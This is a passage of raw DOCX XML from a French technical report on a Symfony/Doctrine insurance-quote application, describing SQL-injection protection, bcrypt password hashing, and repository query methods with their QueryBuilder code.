      <w:r>
        <w:t>() et ne sont jamais concaténées directement dans le SQL, ce qui protège contre les injections SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A347AF" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7801D352" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'intégrité référentielle est garantie par les contraintes de clés étrangères définies dans les migrations SQL (entre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subscription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et user, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vehicle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, document et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subscription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). Ces contraintes empêchent la création d'enregistrements orphelins en base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914ED51" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E1386F" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les mots de passe utilisateurs sont hachés avec l'algorithme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> via Symfony </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PasswordHasher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avant tout stockage en base de données. Aucun mot de passe n'est jamais stocké en clair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053EC57B" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="542ABA47" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc233817774"/>
      <w:r>
        <w:t>6.2 Développement des composants d'accès aux données</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="06391149" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les repositories Doctrine centralisent la logique de requêtage et exposent des méthodes personnalisées adaptées à chaque contexte d'affichage. Ces méthodes utilisent le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QueryBuilder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour charger les entités liées en une seule requête et éviter le problème de requêtes N+1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5658C8AD" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="271786AA" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc233817775"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Historique des devis (espace utilisateur)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="4C95FE3A" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>méthode</w:t>
      </w:r>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:color w:val="A20000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:color w:val="A20000"/>
        </w:rPr>
        <w:t>findWithVehicleAndFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:color w:val="A20000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QuoteRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> retourne les devis d'un utilisateur, triés du plus récent au plus ancien, avec le véhicule, la formule et le statut de souscription déjà chargés via des jointures LEFT JOIN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3146C213" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="29C85EB7"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QuoteRepository.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06E66641"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findWithVehicleAndFormula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">User </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$user</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>): array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED81F0"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659EA21C"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createQueryBuilder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'q'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BE08C8"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q.vehicle</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426396C1"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019B4980"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q.formula</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3D5F6FBE"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114EA75E"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q.subscription</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's'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117769D6"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's'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D24026C"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r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>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q.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = :user'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597DAE3E"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setParameter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'user'</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$user</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45926587" w14:textId="77777777" w:rsidR="00285F95" w:rsidRPr="00CE5980" w:rsidRDefault="00285F95" w:rsidP="00285F95">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addOrderBy</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q.createdAt</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'DESC'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4DC031" w14:textId="77777777" w:rsidR="00285F95" w:rsidRPr="00285F95" w:rsidRDefault="00285F95" w:rsidP="00285F95">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>getQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2CA9A"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 xml:space="preserve">        -&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>getResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB355A1" w14:textId="77777777" w:rsidR="00285F95" w:rsidRPr="00285F95" w:rsidRDefault="00285F95" w:rsidP="00285F95">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0BB276" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="2ECA5002" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les appels à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addSelect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permettent à Doctrine de récupérer toutes les entités liées dans une seule requête SQL au lieu de déclencher une requête supplémentaire par devis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C1FF0" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="29121168" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc233817776"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Détail d'une souscription (espace utilisateur)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="353286BE" w14:textId="43DE664C" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>La</w:t>
      </w:r>
      <w:r w:rsidR="00285F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">méthode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:color w:val="A20000"/>
        </w:rPr>
        <w:t>findOneWidthQuoteVehicleFormulaDocument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubscriptionRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> charge une souscription précise par son identifiant avec toutes ses relations : le devis, le véhicule, la formule et les documents déposés.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E72DC7D" w14:textId="77777777" w:rsidR="0006208E" w:rsidRDefault="0006208E" w:rsidP="00285F95">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147C6840"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SubscriptionRepository.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03B81FFE"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findOneWidthQuoteVehicleFormulaDocument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int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$id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>): ?Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B0045A"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00A3C991"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createQueryBuilder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's'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26785D20"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s.quote</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'q'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729956DC"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'q'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA63123"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q.vehicle</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25B81403"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21E47A27"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q.formula</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552EF372"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053E4EFC"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s.documents</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'd'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4268C29C"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'd'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FEA2D4"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r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>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's.id = :id'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB975C9"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setParameter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'id'</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$id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE86088"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getQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC2A4F"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getOneOrNullResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7FD790" w14:textId="77777777" w:rsidR="0006208E" w:rsidRPr="00555B5E" w:rsidRDefault="0006208E" w:rsidP="0006208E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32880793" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="27975DA2" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="0006208E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La méthode retourne une instance </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nullable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Subscription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) afin que le contrôleur puisse gérer le cas où la souscription n'existe pas ou n'appartient pas à l'utilisateur connecté.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EFD169" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="2F41A6E0" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="0006208E">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc233817777"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Liste des souscriptions (espace admin)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="04ABB16D" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="0006208E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La méthode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285F95">
        <w:rPr>
          <w:color w:val="A20000"/>
        </w:rPr>
        <w:t>findWidthQuoteVehicleFormulaDocument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est réservée à l'administrateur et retourne l'ensemble des souscriptions de tous les utilisateurs. Une jointure supplémentaire sur l'entité User est ajoutée afin d'afficher les informations du demandeur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C2521A" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="0BF6B564"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SubscriptionRepository.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1299669E"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findWidthQuoteVehicleFormulaDocument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(): array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22027219"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52DFF37C"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createQueryBuilder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's'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748CC40B"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s.quote</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'q'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749DEB1"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'q'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
